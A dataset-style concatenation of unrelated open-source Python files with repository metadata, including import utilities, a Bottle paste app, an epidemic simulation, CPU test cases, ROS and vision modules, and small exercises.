.order_by(Reservation.booked_for_id, ReservationOccurrence.start_dt, Room.id)
.options(contains_eager('reservation').contains_eager('room'))
.all())
for user, user_occurrences in groupby(occurrences, key=attrgetter('reservation.booked_for_user')):
user_occurrences = list(user_occurrences)
if debug:
_print_occurrences(user, user_occurrences)
else:
_notify_occurrences(user, user_occurrences)
if not debug:
db.session.commit()
| [
"hodardhazwinayo@gmail.com"
] | hodardhazwinayo@gmail.com |
71017d23dc19d08ded41fb88369fda81d0999bc6 | 95565fbf6c2418e3a9e4e43e3982da0220dd6881 | /satella/imports.py | b129afaeeb284639221004d7a9e78a638590461a | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | piotrmaslanka/satella | 6adc649bcbcd3ba596650f9c0bfca15cb0ec3a96 | 8dd3d4741c11717f9473b7fdc4b242dfcade7aa9 | refs/heads/develop | 2023-06-23T03:38:19.810958 | 2023-06-08T16:11:39 | 2023-06-08T16:11:39 | 7,431,872 | 14 | 1 | MIT | 2023-01-07T22:14:14 | 2013-01-03T23:02:52 | Python | UTF-8 | Python | false | false | 4,079 | py | import importlib
import os
import pkgutil
import typing as tp
import warnings
__all__ = ['import_from', 'import_class']
def import_class(path: str) -> type:
"""
Import a class identified with given module path and class name
:param path: path, eg. subprocess.Popen
:return: imported class
"""
*path, classname = path.split('.')
import_path = '.'.join(path)
try:
return getattr(importlib.import_module(import_path), classname)
except AttributeError:
raise ImportError('%s not found in %s' % (classname, import_path))
def import_from(path: tp.List[str], package_prefix: str, all_: tp.List[str],
locals_: tp.Dict[str, tp.Any], recursive: bool = True,
fail_on_attributerror: bool = True, create_all: bool = True,
skip_single_underscores: bool = True,
skip_not_having_all: bool = False) -> None:
"""
Import everything from a given module. Append these module's all to.
This will examine __all__ of given module (if it has any, else it will just import everything
from it, which is probably a bad practice and will heavily pollute the namespace.
As a side effect, this will equip all of your packages with __all__.
:param path: module's __path__
:param package_prefix: package prefix to import from. Use __name__
:param all_: module's __all__ to append to
:param recursive: whether to import packages as well
:param fail_on_attributerror: whether to fail if a module reports something in their __all__
that is physically not there (ie. getattr() raised AttributeError
:param locals_: module's locals, obtain them by calling locals() in importing module's context
:param create_all: whether to create artificial __all__'s for modules that don't have them
:param skip_single_underscores: whether to refrain from importing things that are preceded with
a single underscore. Pertains to modules, as well as items
:param skip_not_having_all: skip module's not having an __all__ entry
:raise AttributeError: module's __all__ contained entry that was not in this module
"""
for importer, modname, is_pkg in pkgutil.walk_packages(path, onerror=lambda x: None):
if recursive and is_pkg:
if modname.startswith('_') and skip_single_underscores:
continue
module = importlib.import_module(package_prefix + '.' + modname)
try:
mod_all = module.__all__
except AttributeError:
if skip_not_having_all:
continue
mod_all = []
if create_all:
module.__all__ = mod_all
import_from([os.path.join(path[0], modname)], package_prefix + '.' + modname, mod_all,
module.__dict__, recursive=recursive,
fail_on_attributerror=fail_on_attributerror, create_all=create_all,
skip_not_having_all=skip_not_having_all,
skip_single_underscores=skip_single_underscores),
locals_[modname] = module
if modname not in all_:
all_.append(modname)
elif not is_pkg:
module = importlib.import_module(package_prefix + '.' + modname)
try:
package_ref = module.__all__
except AttributeError:
warnings.warn('Module %s does not contain __all__, enumerating it instead' %
(package_prefix + '.' + modname,), RuntimeWarning)
package_ref = dir(module)
for item in package_ref:
if item.startswith('_') and skip_single_underscores:
continue
try:
locals_[item] = getattr(module, item)
except AttributeError:
if fail_on_attributerror:
raise
else:
if item not in all_:
all_.append(item)
| [
"piotr.maslanka@henrietta.com.pl"
] | piotr.maslanka@henrietta.com.pl |
9891353f85074b0ed1070e11d7f0e2ad93f4360b | 2903ac66369b6bd45889b12629d8c8e34e6089b3 | /frappe_training/frappe_training/doctype/employee_info/employee_info.py | 6af4951315fdbdbbedc4214387b383397fcc6ffd | [
"MIT"
] | permissive | sivaranjanipalanivel/training | 6fa50b5f97fb00894404fba11122599fd796623c | b177c56a319c07dc3467ce3113e332ecee9b81fa | refs/heads/master | 2023-07-17T06:11:29.894363 | 2021-08-02T14:47:31 | 2021-08-02T14:47:31 | 391,987,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 265 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2021, valiantsystems and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
# import frappe
from frappe.model.document import Document
class EmployeeINFO(Document):
pass
| [
"you@example.com"
] | you@example.com |
3db5cbd10cb5bc80f423f1f094adf67a4921cb7c | 6b1be23ee65447932c387dc62f556ef8b2097154 | /oblig3/SIRV_optimal_duration.py | 469e098879045c7a4119170062e0db19908c8681 | [] | no_license | Linueks/inf1100 | fd9fb4e0f338d387aa6d06430a5e484cc4037c8d | 0a4a23144fd047bd3b51c44905e6c78754a053a6 | refs/heads/main | 2023-02-20T19:47:21.264189 | 2021-01-23T13:29:02 | 2021-01-23T13:29:02 | 332,216,763 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,769 | py | from SIRV_varying_p import ProblemSIRV, SolverSIRV
import matplotlib.pyplot as plt
def optimal_duration():
maximum_I = []
time_points = range(0, 31, 1)
for time in time_points:
optimal_duration_problem = ProblemSIRV(p = lambda t: 0.1 if 6 <= t <= 6 + time else 0,
beta=0.0005, v=0.1, S0=1500, I0=1, R0=0, V0=0, T=60)
optimal_duration_sim = SolverSIRV(optimal_duration_problem, 0.5)
optimal_duration_sim.solve()
maximum_I.append(optimal_duration_sim.calc_max())
return maximum_I
def plot(values):
vaccination_time = []
maximum_infected = []
for vac_time, max_infected in enumerate(values):
vaccination_time.append(vac_time)
maximum_infected.append(max_infected)
plt.plot(vaccination_time, maximum_infected)
plt.show()
if __name__ == '__main__':
plot(optimal_duration())
print optimal_duration()
"""
The number of infected converges to 441 after 9 days of vaccination, when beta=0.0005
[Linueks@localhost oblig3]$ python SIRV_optimal_duration.py
[877.35589758894105, 764.25790220192289, 669.12776810141145, 591.69267415980698,
532.47707953201677, 490.46684184740479, 462.89122901853545, 447.73309998415226,
441.94995442418212, 441.57841906399926, 441.57841906399926, 441.57841906399926,
441.57841906399926, 441.57841906399926, 441.57841906399926, 441.57841906399926,
441.57841906399926, 441.57841906399926, 441.57841906399926, 441.57841906399926,
441.57841906399926, 441.57841906399926, 441.57841906399926, 441.57841906399926,
441.57841906399926, 441.57841906399926, 441.57841906399926, 441.57841906399926,
441.57841906399926, 441.57841906399926, 441.57841906399926]
"""
| [
"noreply@github.com"
] | Linueks.noreply@github.com |
da568daf9fc7b5f7c51214728a20aade8ee98fae | 7a17f06fc65106e793ad8e23612d32266f14b1dc | /tests/cp2/test_cp2_cjalr_delay_2.py | 8940dcd76c1dc9c9d6d9555a7ba9951f47cf1f4c | [
"LicenseRef-scancode-beri-hw-sw-1.0"
] | permissive | capt-hb/cheritest | 19eda13df15aeba0003e550d97000827090f382a | dacc190eed70261e51a8a438203f680dc52a95c0 | refs/heads/master | 2023-01-19T20:05:40.020021 | 2020-06-11T07:51:26 | 2020-06-11T07:51:26 | 238,688,997 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,628 | py | #-
# Copyright (c) 2018 Alex Richardson
# All rights reserved.
#
# This software was developed by the University of Cambridge Computer
# Laboratory as part of the Rigorous Engineering of Mainstream Systems (REMS)
# project, funded by EPSRC grant EP/K008528/1.
#
# @BERI_LICENSE_HEADER_START@
#
# Licensed to BERI Open Systems C.I.C. (BERI) under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. BERI licenses this
# file to you under the BERI Hardware-Software License, Version 1.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.beri-open-systems.org/legal/license-1-0.txt
#
# Unless required by applicable law or agreed to in writing, Work distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# @BERI_LICENSE_HEADER_END@
#
from beritest_tools import BaseBERITestCase, attr
@attr('capabilities')
class test_cp2_cjalr_delay_2(BaseBERITestCase):
def test_cjalr_return_cap_in_delay_slot(self):
'''Test that the new value of $c17 is available in the delay slot'''
self.assertRegisterEqual(self.MIPS.c4.offset, self.MIPS.t0 - 8, "return address offset wrong")
self.assertCapabilitiesEqual(self.MIPS.c4, self.MIPS.c17, "storing $c17 in the delay slot should yield the link address")
def test_cjalr_return_cap_after_delay_slot(self):
self.assertRegisterEqual(self.MIPS.c5.offset, self.MIPS.t0 - 8, "return address offset wrong")
self.assertRegisterEqual(self.MIPS.c17.offset, self.MIPS.t0 - 8, "return address offset wrong")
def test_cjalr_jump_cap_after_delay_slot(self):
self.assertRegisterEqual(self.MIPS.c6.offset, self.MIPS.t0, "jump cap modified by cjalr?")
self.assertRegisterEqual(self.MIPS.c12.offset, self.MIPS.t0, "jump cap modified by cjalr?")
def test_jalr_return_addr_in_delay_slot(self):
'''Test that the new value of $ra is available in the delay slot'''
self.assertRegisterEqual(self.MIPS.a0, self.MIPS.t9 - 8, "return address wrong")
def test_jalr_return_addr_after_delay_slot(self):
self.assertRegisterEqual(self.MIPS.a1, self.MIPS.t9 - 8, "return address wrong")
def test_jalr_jump_addr_after_delay_slot(self):
self.assertRegisterEqual(self.MIPS.a2, self.MIPS.t9, "jump address modified by jalr?")
| [
"Alexander.Richardson@cl.cam.ac.uk"
] | Alexander.Richardson@cl.cam.ac.uk |
a5133468f1e3ac2b8f5cff07596ef2a408f55caf | 90047daeb462598a924d76ddf4288e832e86417c | /third_party/WebKit/Source/build/scripts/make_element_lookup_trie.py | 89b0d36b65ea2270b86f8b56a979d0c65b744131 | [
"BSD-3-Clause",
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"MIT",
"Apache-2.0"
] | permissive | massbrowser/android | 99b8c21fa4552a13c06bbedd0f9c88dd4a4ad080 | a9c4371682c9443d6e1d66005d4db61a24a9617c | refs/heads/master | 2022-11-04T21:15:50.656802 | 2017-06-08T12:31:39 | 2017-06-08T12:31:39 | 93,747,579 | 2 | 2 | BSD-3-Clause | 2022-10-31T10:34:25 | 2017-06-08T12:36:07 | null | UTF-8 | Python | false | false | 3,206 | py | #!/usr/bin/env python
# Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
import json5_generator
import trie_builder
import template_expander
class ElementLookupTrieWriter(json5_generator.Writer):
# FIXME: Inherit all these from somewhere.
default_parameters = {
'JSInterfaceName': {},
'constructorNeedsCreatedByParser': {},
'interfaceName': {},
'noConstructor': {},
'runtimeEnabled': {},
}
default_metadata = {
'attrsNullNamespace': None,
'export': '',
'fallbackInterfaceName': '',
'fallbackJSInterfaceName': '',
'namespace': '',
'namespacePrefix': '',
'namespaceURI': '',
}
def __init__(self, json5_file_paths):
super(ElementLookupTrieWriter, self).__init__(json5_file_paths)
self._tags = {}
for entry in self.json5_file.name_dictionaries:
self._tags[entry['name']] = entry['name']
self._namespace = self.json5_file.metadata['namespace'].strip('"')
self._outputs = {
(self._namespace + 'ElementLookupTrie.h'): self.generate_header,
(self._namespace + 'ElementLookupTrie.cpp'): self.generate_implementation,
}
@template_expander.use_jinja('ElementLookupTrie.h.tmpl')
def generate_header(self):
return {
'namespace': self._namespace,
}
@template_expander.use_jinja('ElementLookupTrie.cpp.tmpl')
def generate_implementation(self):
return {
'namespace': self._namespace,
'length_tries': trie_builder.trie_list_by_str_length(self._tags)
}
if __name__ == '__main__':
json5_generator.Maker(ElementLookupTrieWriter).main()
| [
"xElvis89x@gmail.com"
] | xElvis89x@gmail.com |
891f93e7f6991eb5a01701d37ad594831e3e606d | 468eacfd3e5e20e15ba4c98a136ff6aca4431a73 | /Labs/oop-1-employees.py | f6e9c036c60148fddabccfd73e0aa4f5cdca2148 | [] | no_license | DREAMS-lab/SES230-Coding-for-Exploration | b9888d837472efa33bc6047faa8ffd1fce00cb43 | f799b6c2fe7f199fed5dc33f2f6e69ca2e06dbc9 | refs/heads/master | 2023-01-07T20:54:04.465586 | 2020-11-11T16:56:01 | 2020-11-11T16:56:01 | 312,028,818 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 746 | py | class Employee:
"""Fill in the details"""
def __init__(self, _name='John Doe', _title='nothing', _salary=0):
self.__name = _name
self.title = _title
self.salary = _salary
def __str__(self):
return self.__name + ' ' + self.title + ' ' + str(self.salary)
def get_name(self):
"""return the name of the employee"""
return self.__name
def set_salary(self, _salary):
"""Changes the salary of the employee"""
self.salary = _salary
employee3 = Employee()
print(employee3)
scrooge_and_marley_employees = [(Employee("Bob Cratchit", 'clerk', 15)), (Employee('Ebenezer', 'founder', 1000))]
for employee in scrooge_and_marley_employees:
print(employee.get_name())
| [
"jnaneshwar.das@gmail.com"
] | jnaneshwar.das@gmail.com |
13f6a301539f7a1edd24c3d259ad5391980283c4 | 4d40ea521582b88a8373845cd47c94c2fdd3125c | /src/chapter3/test_marks.py | b7eca7c90cb009bd26faa006a0ed26bee72803e4 | [] | no_license | lancelote/pytest-quick-start-guide | a74d01ae322f798e7e1fa4f54ad2432f42d6747f | b76f515b5f4034f195b294e4e13befbad4790d1b | refs/heads/master | 2020-03-29T14:19:17.725110 | 2018-11-07T10:01:31 | 2018-11-07T10:01:31 | 150,010,679 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 638 | py | import pytest
@pytest.mark.slow
def test_long_computation():
pass
@pytest.mark.timeout(10, method='thread')
def test_topology_sort():
pass
@pytest.mark.slow
@pytest.mark.timeout(10, method='thread')
def test_topology_sort_slow():
pass
timeout10 = pytest.mark.timeout(10, method='thread')
@timeout10
def test_topology_sort_deco():
pass
@timeout10
def test_remove_duplicate_point():
pass
@timeout10
class TestCase:
def test_simple_simulation(self):
pass
def test_compute_tracers(self):
pass
# To apply a mark to a module
pytestmark = [pytest.mark.slow, pytest.mark.timeout(10)]
| [
"lancelote.du.lac@gmail.com"
] | lancelote.du.lac@gmail.com |
120fce3b3efd1034b3432b64e7fb3e599460cce4 | f67986550761cf3ed174d01063f5fdc8a26f59f3 | /vision/modules/YellowBuoy.py | 8f6cbc2d3f99cd730e91568440d78e8e8c8c7b08 | [
"BSD-3-Clause"
] | permissive | wpfhtl/software | 4dd5d116a1c90660264b32006617a6809b0a530e | 575d424be6b497e0f34f7297a9b322567c2e26c0 | refs/heads/master | 2021-01-23T02:40:49.542461 | 2016-04-15T04:16:21 | 2016-04-15T04:16:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 856 | py | import shm
from vision.modules import ModuleBase, buoy_common
from vision import options
capture_source = 'forward'
options = [options.IntOption('hls_h_min', 105, 0, 255),
options.IntOption('hls_h_max', 143, 0, 255),
options.IntOption('lab_a_min', 127, 0, 255),
options.IntOption('lab_a_max', 235, 0, 255),
options.IntOption('lab_b_min', 3, 0, 255),
options.IntOption('lab_b_max', 123, 0, 255),
options.IntOption('min_area', 100, 0, 1000000),
options.DoubleOption('min_circularity', 0.5, 0, 1),
options.BoolOption('verbose', False)
]
class YellowBuoy(ModuleBase.ModuleBase):
def __init__(self, logger):
super(YellowBuoy, self).__init__(options, True)
def process(self, mat):
buoy_common.process(self, mat, shm.yellow_buoy_results)
| [
"software@cuauv.org"
] | software@cuauv.org |
4e050d2bbdac743366012d0ff8e56b35566b6b0e | bbc7d39cea6dadae9b2ffb114c8474c9c3b6d305 | /main.py | 885f10bc222b0b9e40e7bbd1e9cc7f2d1ce9c6d6 | [] | no_license | jfriedly/paste-math | 0018890c5bab2dd31a817a3aca6ac020c7e9613c | 0b171433fee5aefd562cfd730f969cf931ce86c1 | refs/heads/master | 2021-01-16T00:49:49.269091 | 2013-02-19T22:34:48 | 2013-02-19T22:34:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,623 | py | from lib import bottle
from lib.bottle import route, template, request, error, debug, static_file
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.api.app_identity import get_default_version_hostname
import lib.db
from lib.html import addLineBreaks
from google.appengine.api import users
import datetime
import logging
today=datetime.datetime.today
class Object():
pass
@route('/')
def index():
if not users.is_current_user_admin():
q = lib.db.q("SELECT * FROM Page WHERE published = True ORDER BY timestamp DESC")
#q = lib.db.Page.all()
result = [[p.url, p.title] for p in q.run()]
output = template('templates/index', rows=result, users=users)
else:
#result = lib.db.q("SELECT * FROM Page")
q = lib.db.Page.all()
q.order('-timestamp')
todo = lib.db.Todo.all()
result = [[p.url, p.title, p.published] for p in q.run()]
output = template('templates/admin', rows=result, users=users, todo=todo)
return output
@route('/show/:name')
def show(name):
if not users.is_current_user_admin():
pass
q = lib.db.Page.gql("WHERE url = :1", name)
p = q.get()
if not p:
p = Object()
p.title = "Unknown Page"
p.content = "This page does not exist."
title = p.title
content = addLineBreaks(p.content)
return template('templates/show_page.tpl', title=title, body=content)
#content = convertList(lst)
@route('/view/:name')
def view(name):
q = lib.db.Page.gql("WHERE url = :1", name)
p = q.get()
if not p:
p = Object()
p.title = "Unknown Page"
p.content = "This page does not exist."
title = p.title
content = addLineBreaks(p.content)
return template('templates/view_page.tpl', title=title, body=content)
#content = convertList(lst)
@route('/new', method='GET')
def new():
return template('templates/new_preview.tpl')
@route('/new', method='POST')
def new_post():
if request.POST.get('save','').strip():
title = request.POST.get('title', '').strip()
data = request.POST.get('data', '').strip()
url = lib.db.getUrlString()
lib.db.Page(title=title, content=data, url=url, published=False, timestamp=today()).put()
message = '<p>The new page was inserted into the database, \
the ID is %s</p>' % (url)
return template('templates/submit.tpl', body=message,
data=addLineBreaks(data), title=title, url=url)
elif request.POST.get('publish','').strip():
title = request.POST.get('title', '').strip()
data = request.POST.get('data', '').strip()
url = lib.db.getUrlString()
lib.db.Page(title=title, content=data, url=url, published=True, timestamp=today()).put()
message = '<p>The new page was inserted into the database, \
the ID is %s</p>' % (url)
return template('templates/submit.tpl', body=message,
data=addLineBreaks(data), title=title, url=url)
@route('/todo', method='GET')
def new():
body = '''
<p>Add a new task to the ToDo list:</p>
<form action="/todo" method="POST">
Title: <br>
<input type="text" name="title"><br>
Body: <br>
<textarea name="data" cols="80" rows="20">
</textarea>
<br />
<input type="submit" name="save" value="save">
</form>
'''
return template('templates/simple.tpl', body=body)
@route('/todo', method='POST')
def new_post():
if request.POST.get('save','').strip():
title = request.POST.get('title', '').strip()
data = request.POST.get('data', '').strip()
lib.db.Todo(title=title, content=data, open=True).put()
message = '<p>The new task was inserted into the database</p>'
return template('templates/simple.tpl', body=message)
@route('/edit/:name', method='GET')
def edit(name):
q = lib.db.Page.gql("WHERE url = :1", name)
p = q.get()
if not p:
p = Object()
p.title = ""
p.content = ""
title = p.title
content = p.content
#lib.db.d(p)
return template('templates/edit_preview.tpl', name=name, body=content, url=name, title=title, data=addLineBreaks(content))
#@route('/edit_old/:name', method='GET')
#def edit(name):
# q = lib.db.Page.gql("WHERE url = :1", name)
# p = q.get()
# title = p.title
# content = p.content
# return template('templates/edit_active.tpl', name=name, body=content, url=name, title=title)
@route('/edit/:name', method='POST')
def edit_post(name):
if request.POST.get('save','').strip():
title = request.POST.get('title', '').strip()
data = request.POST.get('data', '').strip()
url = request.POST.get('url', '').strip()
q = lib.db.Page.gql("WHERE url = :1", name)
p = q.get()
lib.db.d(p)
if url == name:
message = '<p>The ID %s was successfully updated</p>' % (url)
#lib.db.q('UPDATE Page SET url = ?, data = ? WHERE url = :1', url)
else:
message = '<p>The new task was inserted into the database, the ID is %s</p>' % (url)
#lib.db.Page(title=title, content=data, url=url).put()
lib.db.Page(title=title, content=data, url=url, published=False, timestamp=today()).put()
return template('templates/submit.tpl', body=message,
data=addLineBreaks(data), title=title, url=url)
elif request.POST.get('publish','').strip():
title = request.POST.get('title', '').strip()
data = request.POST.get('data', '').strip()
url = request.POST.get('url', '').strip()
q = lib.db.Page.gql("WHERE url = :1", name)
p = q.get()
lib.db.d(p)
if url == name:
message = '<p>The ID %s was successfully updated</p>' % (url)
#lib.db.q('UPDATE Page SET url = ?, data = ? WHERE url = :1', url)
else:
message = '<p>The new task was inserted into the database, the ID is %s</p>' % (url)
#lib.db.Page(title=title, content=data, url=url).put()
lib.db.Page(title=title, content=data, url=url, published=True, timestamp=today()).put()
return template('templates/submit.tpl', body=message,
data=addLineBreaks(data), title=title, url=url)
@route('/help')
def help():
static_file('help.html', root='.')
@route('/static/<filename>')
def static(filename):
return static_file(filename, root='static')
@route('/json:json#[1-9]+#')
def show_json(json):
conn = sqlite3.connect('math.db')
c = conn.cursor()
c.execute("SELECT data FROM paste WHERE id LIKE ?", (json))
result = c.fetchall()
c.close()
if not result:
return {'task':'This item number does not exist!'}
else:
return {'Task': result[0]}
def main():
#Find a way to check if dev server.
if get_default_version_hostname() == 'localhost:8080':
debug(True)
else:
@error(500)
def Error500(code):
logging.error('There was an internal server error')
message = 'Internal Server Error'
return template('templates/simple.tpl', body=message)
run_wsgi_app(bottle.default_app())
@error(403)
def Error403(code):
logging.warning('There was a 403')
message = 'Get your codes right dude, you caused some error!'
return template('templates/simple.tpl', body=message)
@error(404)
def Error404(code):
logging.warning('There was a 404')
message = 'Stop cowboy, what are you trying to find?'
return template('templates/simple.tpl', body=message)
if __name__=="__main__":
main() | [
"schwendenman.paul@gmail.com"
] | schwendenman.paul@gmail.com |
a3bc08a2eea2aaf15b870cf2f660a74a25c7333c | e79888cd68177e7ec5125270cdc52f888e211e78 | /kiyuna/chapter04/knock32.py | 4831c290a1a6a476a9d47fec6053cfb790a309a1 | [] | no_license | cafenoctua/100knock2019 | ec259bee27936bdacfe0097d42f23cc7500f0a07 | 88717a78c4290101a021fbe8b4f054f76c9d3fa6 | refs/heads/master | 2022-06-22T04:42:03.939373 | 2019-09-03T11:05:19 | 2019-09-03T11:05:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 590 | py | '''
32. 動詞の原形
動詞の原形をすべて抽出せよ.
'''
import sys
from knock30 import mecab_into_sentences
def message(text):
sys.stderr.write(f"\33[92m{text}\33[0m\n")
if __name__ == '__main__':
tgt = '動詞'
res = []
for sentence in mecab_into_sentences():
# メモリには優しくないが,ネストは深くならない
res.extend([d['base'] for d in sentence if d['pos'] == tgt])
message(f'{tgt}の原形の数: {len(res)}')
message(f'{tgt}の原形の種類: {len(set(res))}')
print('上から10個 ->', *res[:10])
| [
"kyuna.prog@gmail.com"
] | kyuna.prog@gmail.com |
828e05d68fa7676fef57ac1f7c5ee4227f6f8f37 | 3ba03246e8ddf25b4f7607d072efad7dfdeb7a85 | /cbf_control/src/main.py | 59213d3470510c8c3ce432c023ab31f43e3a16c0 | [] | no_license | Jaroan/PR2_CBF | c1961c928547cd685e8c7c46452c6c2639764dce | 22b644d1462363bf3594cfe22e6069f22f9931e1 | refs/heads/master | 2021-10-08T16:57:03.671254 | 2018-12-15T04:01:31 | 2018-12-15T04:01:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,032 | py | import rospy
from std_msgs.msg import Float32MultiArray, MultiArrayDimension
import time
from optimizer import Optimizer
def forward_kinematics_func(q):
gfk = GetFK('l_wrist_roll_link', 'base_link')
resp = gfk.get_current_fk(q)
def publisher():
rospy.init_node('trajectory')
pub = rospy.Publisher('trajectory', Float32MultiArray, queue_size=1)
rate = rospy.Rate(100)
num_points = 2
t = Float32MultiArray()
t.layout.dim.append(MultiArrayDimension(
size=num_points, stride=num_points*7, label="points"))
t.layout.dim.append(MultiArrayDimension(size=7, stride=7, label="joints"))
t.layout.data_offset = 0
t.data = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
-0.7853981633974483, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
print(t)
# while not rospy.is_shutdown():
# pub.publish(t)
# rate.sleep()
time.sleep(3)
pub.publish(t)
if __name__ == '__main__':
try:
publisher()
except rospy.ROSInterruptException:
pass
| [
"varagrawal@gmail.com"
] | varagrawal@gmail.com |
cebb283734b02844e2039ccc368112a270cb896b | c39e466c2b6fdffbc410f24669f214e13fb87781 | /PYTHON/TEMA 4/Unit4_examples/Unit4_Functions_example1.py | 61c8f70816785dcaa93e7f65f5fccf3266b2d112 | [] | no_license | enanibus/biopython | 3a58efbcc92f1ce60285a115c620de9295b7d281 | 613d334a5c0502059930d9381a9464ef533cca1c | refs/heads/master | 2021-01-12T17:27:39.516793 | 2017-01-02T18:30:09 | 2017-01-02T18:30:09 | 71,573,732 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | def Media (NumberList):
suma=0
for n in NumberList:
suma=suma+n
result=suma/len(NumberList)
return(result)
Weight4Bq=[70,47,68,56,87,49,48,71,65,62]
AverageWeight4Bq=Media(Weight4Bq)
print(AverageWeight4Bq)
| [
"juanenriqueztraba@gmail.com"
] | juanenriqueztraba@gmail.com |
9222ee7ff2fb1829be3106e311fbfe64e0ed86d0 | 96b4b1339e745fe15d898f301a65a002898d7a70 | /Project4/alt_solns/Final/prob1_sim.py | 442a9b5c20ac3a839a9ce36852de8c5ff993d629 | [] | no_license | abusa1101/AI-coding-problems | 8ace849ec236a059278d684bba644471f99d1979 | d4bfa45ddc2fa1aecbf15161fcea4cb92db8dec1 | refs/heads/master | 2023-08-25T19:28:56.851217 | 2021-10-06T20:39:51 | 2021-10-06T20:39:51 | 235,749,527 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,318 | py | import random as rd
def simulate_slots():
play_num = 0
balance = 10
cherry_payback = 0
while balance:
balance -= 1
play_num += 1
symbols = ["bar", "bell", "lemon", "cherry", "blank", "blank", "blank", "blank"]
wheels = []
for i in range(3):
wheels.append(rd.choice(symbols))
if wheels[0] == "cherry":
if wheels[0] == wheels[1]:
if wheels[1] == wheels[2]:
cherry_payback = 3
else:
cherry_payback = 2
else:
cherry_payback = 1
balance += cherry_payback
elif wheels[0] == wheels[1] and wheels[1] == wheels[2]:
if wheels[0] == "bar":
balance += 20
elif wheels[0] == "bell":
balance += 15
elif wheels[0] == "lemon":
balance += 5
else:
balance += 0
return play_num
TRIES = 10000
VAL = []
for x in range(TRIES):
VAL.append(simulate_slots())
MEAN = sum(VAL) / float(TRIES)
N = len(VAL)
VAL.sort()
if N % 2 == 0:
MEDIAN1 = VAL[N//2]
MEDIAN2 = VAL[N//2 - 1]
MEDIAN = (MEDIAN1 + MEDIAN2)/2
else:
MEDIAN = VAL[N//2]
print("Tries, Mean, Median: %s, %s, %s" % (TRIES, MEAN, MEDIAN))
| [
"abusa@umich.edu"
] | abusa@umich.edu |
7455a9c2dc2c361c1d554d1309ffd459284caa46 | fb3ff12389925480a19b11e6bb51ea760b7af729 | /chat2.py | 23914506991017343a3779cb057d01b0ca95d14a | [] | no_license | sd8917/web_project | 60a353a2bc24600a183a9653765612c5809e9634 | 18228db4980aa7733f2d668d1cb8201df13ec493 | refs/heads/master | 2020-03-31T20:53:06.384469 | 2018-10-11T09:09:12 | 2018-10-11T09:09:12 | 152,559,275 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 262 | py | import socket
s = socket.socket()
host = socket .gethostname()
port = 12345
s.connect((host,port))
while True:
data = str(s.recv(1024)).strip('b').strip('\'')
print(data)
messg = bytes("sudhanshu : " + input(r""),encoding='utf-8')
s.send(messg) | [
"sudhanshuraj8917@gmail.com"
] | sudhanshuraj8917@gmail.com |
459a5c19a5b75157ec9aa8f5eef3223c4ec4fba3 | a63e24d4d6521e98e1b79c2528ab6f08d5add66c | /kps2d_detection/hr_net/lib/utils/utils.py | 9561baa3f456005004fd3a5a38d49dcc505e5f43 | [
"MIT"
] | permissive | abrichr/cvToolkit | 7d3f2e593d3132aae8c519c024383b0f269eeda6 | 7f559138c27fedf9e3e3929cd4d6e4f8198d4c51 | refs/heads/master | 2022-07-19T00:45:52.036959 | 2020-05-26T06:02:24 | 2020-05-26T06:02:24 | 266,943,746 | 0 | 0 | MIT | 2020-05-26T04:24:25 | 2020-05-26T04:24:25 | null | UTF-8 | Python | false | false | 7,023 | py | # ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# Written by Bin Xiao (Bin.Xiao@microsoft.com)
# ------------------------------------------------------------------------------
from __future__ import absolute_import
